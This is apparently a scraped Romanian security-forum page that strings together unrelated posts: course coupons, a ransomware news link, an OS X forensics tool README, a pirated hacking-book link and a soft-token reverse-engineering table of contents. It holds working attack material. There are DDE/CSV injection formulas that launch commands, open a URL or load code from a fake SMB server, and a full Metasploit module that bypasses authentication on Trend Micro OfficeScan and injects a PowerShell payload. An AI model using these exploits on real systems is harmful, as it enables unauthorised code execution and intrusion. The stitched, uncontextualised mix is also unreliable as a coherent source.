Leaderboard

https://www.udemy.com/seo-training-link-building-backlinks-and-keyword-research/?couponCode=FREENOW https://www.udemy.com/insider-secrets-from-an-ethical-hacker-on-internet-safety/?couponCode=ISUFULLPROMO2017 https://www.udemy.com/python-complete/?couponCode=FREEFB4 250 Free Coupons Udemy Courses https://justpaste.it/1c5r5 Nu garantez că toate 250 cursuri sunt la liber dar gasiți voi ceva ce va interesează.

https://www.profit.ro/stiri/exclusiv-atac-informatic-pe-intreaga-baza-de-date-astra-asigurari-lichidatorul-spune-ca-atacatorii-au-cerut-rascumparare-17326468

Inca un articol recent pe aceiasi tema - http://georgemauer.net/2017/10/07/csv-injection.html. Exista cateva chestii dragute care se pot face cu DDE: =cmd|'/C calc'!A0 (exemplul clasic) =IExplore|WWW_OpenURL!www.mataigrasa.com =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0 De cele mai multe ori am intalnit chestia asta in aplicatii web care genereaza rapoarte in format CSV/XLS unde tu ai un oarecare control asupra datelor care intra in raport.

OS X Auditor is a free Mac OS X computer forensics tool. OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze: the kernel extensions the system agents and daemons the third party's agents and daemons the old and deprecated system and third party's startup items the users' agents the users' downloaded files the installed applications It extracts: the users' quarantined files the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore the users' Firefox cookies, downloads, formhistory, permissions, places and signons the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage the users' social and email accounts the WiFi access points the audited system has been connected to (and tries to geolocate them) It also looks for suspicious keywords in the .plist themselves. It can verify the reputation of each file on: Team Cymru's MHR VirusTotal your own local database It can aggregate all logs from the following directories into a zipball: /var/log (-> /private/var/log) /Library/logs the user's ~/Library/logs Finally, the results can be: rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep) rendered as a HTML log file sent to a Syslog server Author Jean-Philippe Teissier - @Jipe_ & al. Support OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector) How to install Just copy all files from GitHub. Dependencies If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc: pip install pyobjc If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing: pip install biplist pip install plist These dependencies will be removed when a working native plist module will be available in python How to run OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare) OS X Auditor is maintained to work on the lastest OS X version. It will do its best on older OS X versions. You must run it as root (or via sudo) if you want to use is on a running system, otherwise it won't be able to access some system and other users' files If you're using API keys from environment variables (see below), you need to use the sudo -E to use the users environment variables Type osxauditor.py -h to get all the available options, then run it with the selected options eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html Setting Environment Variables VirusTotal API: export VT_API_KEY=aaaabbbbccccddddeeee Changelog Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git Source: https://github.com/jipegit/OSXAuditor

What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. In our context DDE works by executing an application, that will provide the data (data provider). In a previous post1 We discussed using DDE in MSExcel to gain command execution, and have had great success in using this technique to bypass macro filtering mail gateways and corporate VBA policies. DDE isn’t only limited to Excel and Word has had DDE capabilities all this time. This has been mentioned by others2 as a possible avenue, but to our knowledge, no-one has actually demonstrated this to work. https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ L-am incercat in Word 2010, si merge.

BRIEF CONTENTS Foreword by Matt Graeber Preface Chapter 1: C# Crash Course Chapter 2: Fuzzing and Exploiting XSS and SQLInjection Chapter 3: Fuzzing SOAP Endpoints Chapter 4: Writing Connect-Back, Binding, and Metasploit Payloads Chapter 5: Automating Nessus Chapter 6: Automating Nexpose Chapter 7: Automating OpenVAS Chapter 8: Automating Cuckoo Sandbox Chapter 9: Automating sqlmap Chapter 10: Automating ClamAV Chapter 11: Automating Metasploit Chapter 12: Automating Arachni Chapter 13: Decompiling and Reversing Managed Assemblies Chapter 14: Reading Offline Registry Hives https://www.google.ro/url?sa=t&source=web&rct=j&url=https://dl.kuroy.me/foreign/learnflakes/Brandon%20Perry%20-%20Gray%20Hat%20C%23/Brandon%20Perry%20-%20Gray%20Hat%20C%23_%20A%20Hacker%27s%20Guide%20to%20Creating%20and%20Automating%20Security%20Tools.pdf&ved=0ahUKEwjk_NfE74nYAhVS46QKHQNyCC4QFggjMAA&usg=AOvVaw1eTppV_6dAAZgoATyu8nOR https://smtebooks.com/Downloads/5794/gray-hat-c-pdf https://github.com/brandonprry/gray_hat_csharp_code https://books.google.ro/books?id=uAYvDwAAQBAJ&pg=PA130&lpg=PA130&dq=Gray+Hat+C%23:+Creating+and+Automating+Security+Tools+pdf&source=bl&ots=ZmCsAeFAsJ&sig=TmcTTAcgaYNH5c6nwy33VaY6fhQ&hl=ro&sa=X&ved=0ahUKEwiKnZr3w-bWAhXMKVAKHexJAA04ChDoAQgkMAE#v=onepage&q=Gray Hat C%23%3A Creating and Automating Security Tools pdf&f=false

http://recordit.co/GTIROeGtVr

This Metasploit module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user. The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => "Trend Micro OfficeScan Remote Code Execution", 'Description' => %q{ This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user. The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <mr_me@offensive-security.com>', # author of command injection 'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module ], 'References' => [ ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'], ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => ['win'], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ ['Automatic Targeting', { 'auto' => true }], ['OfficeScan 11', {}], ['OfficeScan XG', {}], ], 'Privileged' => false, 'DisclosureDate' => "Oct 7 2017", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/']) ] ) end def build_csrftoken(my_target, phpsessid=nil) vprint_status("Building csrftoken") if my_target.name == 'OfficeScan XG' csrf_token = Rex::Text.md5(Time.now.to_s) else csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0] end csrf_token end def auto_target #XG version of the widget library has package.json within the same directory. mytarget = target if target['auto'] && target.name =~ /Automatic/ print_status('Automatic targeting enabled. Trying to detect version.') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'), }) if res && res.code == 200 mytarget = targets[2] elsif res && res.code == 404 mytarget = targets[1] else fail_with(Failure::Unknown, 'Unable to automatically select a target') end print_status("Selected target system : #{mytarget.name}") end mytarget end def auth(my_target) # Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9. # Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie. if my_target.name == 'OfficeScan XG' csrf_token = build_csrftoken(my_target) cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}" # Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us. else vprint_status("Sending session initiation request for : #{my_target.name}.") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'), }) cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}" csrf_token = build_csrftoken(my_target, res.get_cookies) end # Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version. # Now we need to exploit authentication bypass vulnerability. res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'), 'headers' => { 'X-CSRFToken' => csrf_token, 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8' }, 'cookie' => cookie, 'vars_post' => { 'cid' => '1', 'act' => 'check', 'hash' => Rex::Text.rand_text_alpha(10), 'pid' => '1' } }) if res && res.code == 200 && res.body.include?('login successfully') # Another business logic in here. # Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php # Version XG want to use newly created PHPSESSID that comes from auth bypass response. if my_target.name == 'OfficeScan XG' res.get_cookies else cookie end else nil end end def check my_target = auto_target token = auth(my_target) # If we dont have a cookie that means authentication bypass issue has been patched on target system. if token.nil? Exploit::CheckCode::Safe else # Authentication bypass does not mean that we have a command injection. # Accessing to the widget framework without having command injection means literally nothing. # So we gonna trigger command injection vulnerability without a payload. csrf_token = build_csrftoken(my_target, token) vprint_status('Trying to detect command injection vulnerability') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'), 'headers' => { 'X-CSRFToken' => csrf_token, 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8' }, 'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}", 'vars_post' => { 'module' => 'modTMCSS', 'serverid' => '1', 'TOP' => '' } }) if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end end def exploit mytarget = auto_target print_status('Exploiting authentication bypass') cookie = auth(mytarget) if cookie.nil? fail_with(Failure::NotVulnerable, "Target is not vulnerable.") else print_good("Authenticated successfully bypassed.") end print_status('Generating payload') powershell_options = { encode_final_payload: true, remove_comspec: true } p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options) # We need to craft csrf value for version 11 again like we did before at auth function. csrf_token = build_csrftoken(mytarget, cookie) print_status('Trigerring command injection vulnerability') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'), 'headers' => { 'X-CSRFToken' => csrf_token, 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8' }, 'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}", 'vars_post' => { 'module' => 'modTMCSS', 'serverid' => '1', 'TOP' => "2>&1||#{p}" } }) end end Source

Hacking Soft Tokens Advanced Reverse Engineering on Android Bernhard Mueller © 2016 Vantage Point Security Pte. Ltd. Table of Contents Introduction............................................................................................................................................................... 5 Mobile One-Time Password Token Overview.................................................................................................... 6 OATH TOTP..................................................................................................................................................................................6 Proprietary Algorithms...................................................................................................................................................................7 Provisioning......................................................................................................................................................................................7 Attacks...............................................................................................................................................................................................8 Retrieval from Memory..............................................................................................................................................................9 Code Lifting and Instrumentation ...........................................................................................................................................9 The Android Reverser’s Toolbox......................................................................................................................... 10 De-Compilers, Disassemblers and Debuggers.....................................................................................................................10 Tracing Java Code.....................................................................................................................................................................11 Tracing Native Code ................................................................................................................................................................15 Tracing System Calls.................................................................................................................................................................17 Classic Linux Rootkit Style......................................................................................................................................................19 Dynamic Analysis Frameworks..............................................................................................................................................19 Drawbacks Emulation-based Analysis ..................................................................................................................................21 Hacking Soft Tokens - Bernhard Mueller © 2016 Vantage Point Security Pte. 4 of 68 Runtime Instrumentation with Frida .....................................................................................................................................22 Building A Sandbox................................................................................................................................................ 23 Sandbox Overview....................................................................................................................................................................24 Customizing the Kernel...........................................................................................................................................................25 Customizing the RAMDisk.....................................................................................................................................................26 Booting the Environment .......................................................................................................................................................28 Customizing ART.....................................................................................................................................................................29 Hooking System Calls ..............................................................................................................................................................31 Automating System Call Hooking with Zork.......................................................................................................................35 Case Studies ............................................................................................................................................................. 36 RSA SecurID: ProGuard and a Proprietary Algorithm...........................................................................................................37 Analyzing ProGuard-processed Bytecode ............................................................................................................................37 Data Storage and Runtime Encryption .................................................................................................................................39 Tool Time: RSACloneId..........................................................................................................................................................41 Vendor Response......................................................................................................................................................................44 Summary.....................................................................................................................................................................................45 Vasco DIGIPASS: Advanced Anti-Tampering........................................................................................................................47 Initial Analysis ...........................................................................................................................................................................47 Root Detection and Integrity Checks....................................................................................................................................51 Native Debugging Defenses ...................................................................................................................................................54 JDWP Debugging Defenses....................................................................................................................................................56 Static-dynamic Analysis............................................................................................................................................................58 Attack Outline ...........................................................................................................................................................................59 Tool Time: VasClone....................................................................................................................................................................60 Vendor Comments........................................................................................................................................................................64 Summary.....................................................................................................................................................................................65 TL; DR...................................................................................................................................................................... 66 Attack Mitigation...........................................................................................................................................................................66 Software Protection Effectiveness..............................................................................................................................................66 REFERENCES....................................................................................................................................................... 67 Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf

Da, interesant, dar metodele de exploatare (clasic si cu DDE) sunt deja cunoscute de la exploarea CSV injection (https://www.contextis.com/blog/comma-separated-vulnerabilities). Bine de stiut ca functioneaza si in Word, pacat ca si in cazul asta apar doua alerte.

https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/